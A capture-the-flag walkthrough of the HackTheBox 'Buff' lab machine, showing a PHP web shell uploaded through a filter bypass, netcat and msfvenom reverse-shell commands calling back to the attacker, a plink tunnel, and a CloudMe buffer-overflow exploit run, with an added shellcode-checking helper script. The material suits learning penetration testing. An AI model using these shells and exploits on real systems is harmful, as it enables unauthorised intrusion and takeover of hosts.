This is a write-up on the Buff machine access challenge from HTB. For more information on challenges like these, check out my post on penetration testing.  Special thanks to HTB user egotisticalSW for creating the challenge.

Buff was a fun challenge that covers basic application security (an arbitrary file upload in a web application) and a traditional buffer overflow attack. It's an easy challenge and good for beginners or anyone returning to CTFs after a long hiatus.

Reconnaissance

Start with a basic full-port nmap scan, which reveals a web server on port 8080 (any other open ports are not relevant to this challenge).

    nmap -Pn -p- 10.10.10.198

Browsing the website reveals the underlying software to be a gym management system published by ProjectWorlds.  The version in use has a published exploit on exploit-db for an arbitrary file upload in its upload script.

Getting User

Following the details of the exploit and leveraging the built-in upload script upload.php, it is possible to upload arbitrary files.  Start by creating a PHP script that performs remote command execution on the web server.

    <?php echo shell_exec($_GET["telepathy"]); ?>

This script executes whatever command is passed in the telepathy parameter of the HTTP request and returns its output.  Although the file will ultimately be stored as exec.php, name the local file exec.php.png. The double extension is required to get past the filter in upload.php, which under normal circumstances allows only certain file types, such as images, to be uploaded; the name the file is stored under comes from the id parameter in the form action below.

Create a local html webpage with the code below. This is a simple way to exploit the vulnerability without the need for additional tools.

    <form action="http://10.10.10.198:8080/upload.php?id=exec" method="post" enctype="multipart/form-data">
      Select image to upload:
      <input type="file" id="file" name="file">
      <input hidden name="pupload" value="upload">
      <input type="submit" value="Upload" name="submit">
    </form>

Open the local html page in a web browser, select the file exec.php.png for upload and click the upload button. Once the file has uploaded, it should be possible to execute remote commands.  Test by browsing to http://10.10.10.198:8080/upload/exec.php?telepathy=whoami.  It will display "shaun", the id of the user the web server runs as.  Obtain the user flag by browsing to http://10.10.10.198:8080/upload/exec.php?telepathy=type c:\users\shaun\desktop\user.txt (the browser URL-encodes the spaces and backslashes for you).

Repeat the process to upload Windows binaries of nc.exe and plink.exe, which will be required later on. Make sure each is a standalone binary, not an MSI, and confirm the upload by browsing to http://10.10.10.198:8080/upload/exec.php?telepathy=dir. On the web server, the files will be located in C:\xampp\htdocs\gym\upload.

Getting A Reverse Shell

Start by preparing a local listener which the reverse shell can connect back to. Netcat works best for this.

    nc -lnvp 1234

Browse to http://10.10.10.198:8080/upload/exec.php?telepathy=C:\xampp\htdocs\gym\upload\nc.exe <LOCAL IP> 1234 -e powershell.exe and a PowerShell prompt will appear in the terminal running netcat. The full path to nc.exe is needed because the web server's working directory is not the upload folder.

Enumeration

Standard enumeration is easier with a reverse shell.  The first important discovery is the CloudMe installer, found at C:\Users\shaun\Downloads\CloudMe_1112.exe, a version with a known buffer overflow. The other important find is that the CloudMe service, which normally listens on port 8888, is bound only to the loopback interface, so it cannot be reached from any other device. (This is discovered by running netstat -an | findstr "8888", which returns 127.0.0.1:8888 as the local address with a state of LISTENING.)

Start Tunneling

It's not possible to expose the CloudMe service directly on the public network interface, but it is possible to create a tunnel from an outside device (e.g. the attacker workstation) into the server and reach the service that way.

Create an account called attacker on the attacker workstation. Make sure that ssh is enabled and the attacker user can log in remotely; use a dedicated, low-privilege account for this, since its credentials will be typed on the compromised host.  Plink is an SSH client and can be leveraged to tunnel traffic into the web server. From the reverse shell, run the plink.exe binary uploaded earlier (plink will prompt to cache the workstation's host key on first use, and -pw <password> can be added if the non-interactive shell does not handle the password prompt):

    C:\xampp\htdocs\gym\upload\plink.exe -l attacker <LOCAL IP> -N -R 8888:127.0.0.1:8888

After login, the attacker workstation will have a listener on port 8888 (bound to its loopback interface) which forwards traffic through the tunnel to the web server and from there to 127.0.0.1 port 8888.  In other words, connections to 127.0.0.1:8888 on the attacker workstation will be directed to the CloudMe service running on the web server. Confirm the listener is up on the workstation before moving on; the -N flag means plink opens no shell, so the reverse shell will simply sit there while the tunnel is active.

Prepare The Attack

The exploit used on the CloudMe service is a Python script found on exploit-db for CloudMe Sync 1.11.2, matching the CloudMe_1112.exe build found above. Download the exploit and save it as 44470.py. It targets 127.0.0.1:8888, which is exactly where the tunnel delivers connections.

Run the command below to generate new shellcode for the payload. Replace the existing shellcode in the script with the output of the command, pasting only the string literals in whatever shape the script declares its buffer (-f python produces output that can be pasted into a Python script as-is).  Note that LPORT must match the port number used when opening the netcat listener in the next step. If the shell never connects back, regenerate the payload with -b '\x00\x0a\x0d' so that null bytes and line breaks, which can truncate the buffer before it reaches the vulnerable code, are excluded.

    msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL IP> LPORT=1236 -f c
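Pasting a few hundred bytes of escaped hex by hand is where these exploits usually go wrong. The helper below is an added example, not part of the write-up or of the exploit-db script: it parses msfvenom output in either the -f c or the -f python layout (both emit "\x.." string literals), checks the result for bad characters and for size, and re-emits it as Python lines ready to drop into the script. The bad-character set and the size limit are assumptions the reader must take from the script's own comments and padding, and the sample output embedded in the code is constructed, not real msfvenom output.

```python
# Added example, not part of the write-up or of 44470.py: parse msfvenom output
# (-f c or -f python, both emit "\x.." string literals), check it for bad
# characters and size before pasting it over the script's shellcode, and re-emit
# it as Python lines. DEFAULT_BAD and max_len are assumptions: take the real
# values from the exploit script's comments and padding.
import re

HEX_STRING = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')   # one "\x..\x.." literal
HEX_BYTE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed sample in the -f c layout; a real payload is a few hundred bytes.
SAMPLE_C_OUTPUT = (
    "unsigned char buf[] = \n"
    '"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5"\n'
    '"\\x31\\xc0\\x64\\x8b\\x50\\x30";\n'
)

DEFAULT_BAD = b"\x00\x0a\x0d"   # NUL and CR/LF, the usual suspects for a string-handled buffer


def parse_msfvenom(text):
    """Collect every \\xNN escape inside double-quoted literals into bytes."""
    out = bytearray()
    for literal in HEX_STRING.findall(text):
        out.extend(int(h, 16) for h in HEX_BYTE.findall(literal))
    return bytes(out)


def find_bad_chars(shellcode, bad=DEFAULT_BAD):
    """Return (offset, value) for each bad byte so the reader can see where it sits."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def check_shellcode(shellcode, max_len, bad=DEFAULT_BAD):
    """Return a list of problems; an empty list means the payload can be pasted."""
    problems = []
    if len(shellcode) == 0:
        problems.append("no shellcode parsed")
    if len(shellcode) > max_len:
        problems.append(f"{len(shellcode)} bytes exceeds the {max_len}-byte space in the buffer")
    for off, val in find_bad_chars(shellcode, bad):
        problems.append(f"bad character 0x{val:02x} at offset {off}")
    return problems


def as_python_literal(shellcode, width=16):
    """Re-emit as buf += b"..." lines (the -f python shape) for a Python exploit script."""
    lines = ['buf = b""']
    for i in range(0, len(shellcode), width):
        chunk = shellcode[i:i + width]
        lines.append('buf += b"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    import sys
    # usage: msfvenom ... -f c > payload.c && python3 this.py payload.c
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_C_OUTPUT
    sc = parse_msfvenom(text)
    for p in check_shellcode(sc, max_len=400):   # 400 is a placeholder limit
        print("WARNING:", p)
    print(as_python_literal(sc))
```

Run against the constructed sample, the checker flags the three null bytes that an unencoded windows/shell_reverse_tcp stub contains; that is the case where regenerating with -b is needed before the payload is usable.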

Buffer Overflow

Using netcat, open a new local listener which will be used for an administrative reverse shell.

    nc -lnvp 1236

In a separate terminal, run the exploit (with python2 if the script still uses Python 2 string handling).

    python 44470.py

A Windows command prompt, running as the Administrator user, will appear in the netcat listener.  The oversized request has overflowed a buffer in the CloudMe service and redirected execution into the shellcode, which opens a reverse shell to the listener; because the service runs as Administrator, so does the shell.

Obtain the root flag in the administrative reverse shell with the command type c:\users\administrator\desktop\root.txt.